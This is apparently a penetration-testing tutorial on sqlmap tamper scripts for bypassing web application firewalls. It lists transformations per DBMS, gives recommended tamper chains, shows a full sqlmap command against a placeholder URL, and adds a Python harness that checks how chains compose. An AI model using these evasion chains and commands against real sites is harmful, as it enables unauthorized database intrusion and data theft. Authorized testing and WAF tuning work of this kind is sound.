SQLmap tamper script for bypassing WAF

Tamper injection data

Option: --tamper

sqlmap itself does no obfuscation of the payload it sends, except that strings between single quotes are replaced by their CHAR()-like representation. Everything beyond that is the job of tamper scripts.

This option can be very useful and powerful in situations where there is a weak input validation mechanism between you and the back-end database management system. This mechanism usually is a self-developed input validation routine called by the application source code, an expensive enterprise-grade IPS appliance or a web application firewall (WAF). All buzzwords to define the same concept, implemented in a different way and costing lots of money, usually.

To take advantage of this option, provide sqlmap with a comma-separated list of tamper scripts; each one receives the payload, transforms it and hands it on. You can write your own tamper scripts, use the ones sqlmap ships in the tamper/ folder, or edit those, as long as you pass them comma-separated as the value of --tamper (e.g. --tamper="between,randomcase").

The tamper scripts shipped with sqlmap (in the tamper/ directory) and what each one does:

  1. apostrophemask.py replaces the apostrophe (') with its UTF-8 full-width counterpart (%EF%BC%87)
  2. apostrophenullencode.py replaces the apostrophe (') with its illegal double-Unicode counterpart (%00%27)
  3. appendnullbyte.py appends a NULL byte (%00) to the end of the payload (Microsoft Access)
  4. base64encode.py Base64-encodes the whole payload
  5. between.py replaces the greater-than operator (>) with NOT BETWEEN 0 AND # and the equals operator (=) with BETWEEN # AND #
  6. bluecoat.py replaces the space after an SQL statement with a valid random blank character, then replaces = with LIKE
  7. chardoubleencode.py double URL-encodes every character of the payload (characters that are already encoded are left alone)
  8. charencode.py URL-encodes every character of the payload (already encoded characters are left alone)
  9. charunicodeencode.py Unicode-URL-encodes every character of the payload, e.g. %u0053 for S (already encoded characters are left alone)
  10. concat2concatws.py replaces MySQL CONCAT(A, B) with CONCAT_WS(MID(CHAR(0), 0, 0), A, B)
  11. equaltolike.py replaces every equals operator (=) with LIKE
  12. greatest.py replaces the greater-than operator (>) with the GREATEST function
  13. halfversionedmorekeywords.py adds an unclosed MySQL versioned comment (/*!0) before each keyword
  14. ifnull2ifisnull.py replaces IFNULL(A, B) with IF(ISNULL(A), B, A)
  15. lowercase.py converts each keyword to lower case
  16. modsecurityversioned.py wraps the complete query in a MySQL versioned comment
  17. modsecurityzeroversioned.py wraps the complete query in a MySQL zero-versioned comment (/*!00000 ... */)
  18. multiplespaces.py adds multiple spaces around SQL keywords
  19. nonrecursivereplacement.py replaces predefined SQL keywords with representations that survive non-recursive replacement filters (e.g. a single .replace("SELECT", "") pass)
  20. overlongutf8.py converts every character of the payload to its overlong UTF-8 form (already encoded characters are left alone)
  21. percentage.py adds a percent sign (%) in front of each character (ASP)
  22. randomcase.py randomises the case of each keyword character
  23. randomcomments.py inserts random inline comments into SQL keywords
  24. securesphere.py appends a specially crafted string to the payload
  25. sp_password.py appends 'sp_password' to the end of the payload so MSSQL omits it from its logs
  26. space2comment.py replaces spaces with the inline comment /**/
  27. space2dash.py replaces spaces with a dash comment (--) followed by a random string and a newline
  28. space2hash.py replaces spaces with a pound character (#) followed by a random string and a newline (MySQL)
  29. space2morehash.py is a more aggressive space2hash.py that also places such comments after function names (MySQL 5.1.41 and later)
  30. space2mssqlblank.py replaces spaces with a random blank character from the set MSSQL accepts as whitespace
  31. space2mssqlhash.py replaces spaces with a pound character (#) followed by a newline
  32. space2mysqlblank.py replaces spaces with a random blank character from the set MySQL accepts as whitespace
  33. space2mysqldash.py replaces spaces with a dash comment (--) followed by a newline
  34. space2plus.py replaces spaces with a plus sign (+)
  35. space2randomblank.py replaces spaces with a random blank character from a set of valid alternatives (tab, newline, form feed, carriage return)
  36. unionalltounion.py replaces UNION ALL SELECT with UNION SELECT
  37. unmagicquotes.py replaces the quote character (') with the multi-byte combination %BF%27 and appends a generic comment so the query still parses (defeats addslashes()-style escaping on multi-byte charsets such as GBK)
  38. varnish.py appends an X-originating-IP HTTP header to bypass the Varnish firewall
  39. versionedkeywords.py encloses each non-function keyword in a MySQL versioned comment
  40. versionedmorekeywords.py encloses each keyword in a MySQL versioned comment

Usage

The three lists below come from the Bugcrowd thread referenced at the end. Treat them as a menu of candidates for each back-end, not as a recipe: sqlmap runs the scripts one after another, ordered by each script's priority, so scripts that rewrite the same characters overlap. The second of two space2* scripts finds no spaces left to replace, and charencode and charunicodeencode both want to encode the same characters, so whichever runs second has little or nothing left to do. Start with one or two scripts matched to the DBMS and to what the WAF actually blocks, and check with -v 3 that the transformed payloads still parse on the back-end before adding more.

MSSQL:

--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

MySQL:

--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

General tamper testing:

--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

Example:

The command below loads nearly every tamper script at once. sqlmap will offer to reorder them by priority, but many of them rewrite the same characters and cancel each other out, so read it as a stress test of the chain rather than a recommended configuration.

sqlmap -u 'http://www.site.com:80/search.cmd?form_state=1' --level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
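The chains above only work as intended if the scripts compose. As an added example (not sqlmap code), the harness below uses cut-down stand-ins for four stock scripts, with the priority values the real scripts declare, and applies them the way sqlmap does: highest priority first (sqlmap warns when the list you give is not already in that order and offers to reorder it). It shows two things the long lists hide: two scripts that both replace spaces leave the second one with nothing to do, and a final encoder such as charencode has to run last, because once `=` has become `%3D`, equaltolike can no longer find it. The sample payload is constructed.

```python
"""
Added example, not sqlmap code: how a --tamper chain composes.

The four functions are cut-down stand-ins for the stock scripts of the same
name. The priority values next to them are the ones the real scripts declare
in tamper/*.py (PRIORITY.HIGHEST = 100, LOW = -10, LOWEST = -100).
"""
import re


def equaltolike(payload):
    # equaltolike.py: every '=' (with surrounding blanks) becomes ' LIKE '
    return re.sub(r"\s*=\s*", " LIKE ", payload) if payload else payload


def space2comment(payload):
    # space2comment.py: every space becomes the inline comment /**/
    return payload.replace(" ", "/**/") if payload else payload


def space2plus(payload):
    # space2plus.py: every space becomes '+'
    return payload.replace(" ", "+") if payload else payload


def charencode(payload):
    # charencode.py: URL-encode every character, leaving existing %xx sequences alone
    if not payload:
        return payload
    return re.sub(r"%[0-9A-Fa-f]{2}|.",
                  lambda m: m.group(0) if len(m.group(0)) == 3 else "%%%02X" % ord(m.group(0)),
                  payload, flags=re.DOTALL)


# (priority, function) for each stand-in; higher runs earlier
SCRIPTS = {
    "equaltolike":   (100,  equaltolike),    # PRIORITY.HIGHEST
    "space2comment": (-10,  space2comment),  # PRIORITY.LOW
    "space2plus":    (-10,  space2plus),     # PRIORITY.LOW
    "charencode":    (-100, charencode),     # PRIORITY.LOWEST
}


def sqlmap_order(names):
    """The order sqlmap runs scripts in: by priority, highest first.
    Equal priorities keep the order given on the command line here."""
    return sorted(names, key=lambda n: SCRIPTS[n][0], reverse=True)


def chain(payload, names):
    """Apply the named scripts in sqlmap's order and return the final payload."""
    for name in sqlmap_order(names):
        payload = SCRIPTS[name][1](payload)
    return payload


def apply_in_order(payload, names):
    """Apply the scripts exactly as listed, i.e. what happens if you decline
    sqlmap's offer to reorder a mixed-up list."""
    for name in names:
        payload = SCRIPTS[name][1](payload)
    return payload


def no_op_scripts(payload, names):
    """Names of scripts that changed nothing in sqlmap's order: each one is a
    sign of overlap with an earlier script, i.e. a wasted or conflicting entry."""
    idle = []
    for name in sqlmap_order(names):
        before, payload = payload, SCRIPTS[name][1](payload)
        if payload == before:
            idle.append(name)
    return idle


if __name__ == "__main__":
    probe = "1 AND 1=1"                                         # constructed sample payload
    print(chain(probe, ["space2comment", "space2plus"]))        # space2plus has nothing left
    print(no_op_scripts(probe, ["space2comment", "space2plus"]))
    print(chain(probe, ["charencode", "equaltolike"]))          # LIKE survives: encoder ran last
    print(apply_in_order(probe, ["charencode", "equaltolike"])) # '=' already %3D, LIKE never applied
```

The `no_op_scripts` check is the one worth keeping: run a candidate chain over a few representative payloads and any script that reports as idle is either redundant with an earlier one or placed too late to see the characters it targets.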

 

References:

  • https://github.com/sqlmapproject/sqlmap/tree/master/tamper
  • https://forum.bugcrowd.com/t/sqlmap-tamper-scripts-sql-injection-and-waf-bypass/423